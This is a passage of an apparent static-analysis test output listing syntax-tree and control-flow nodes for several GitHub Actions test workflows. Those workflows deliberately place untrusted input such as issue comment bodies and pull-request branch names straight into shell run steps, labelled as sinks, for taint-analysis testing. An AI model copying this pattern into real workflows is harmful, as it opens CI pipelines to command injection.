+| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 
echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | 
issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
+| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 
| LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | 
ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | 
on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| 
.github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step 
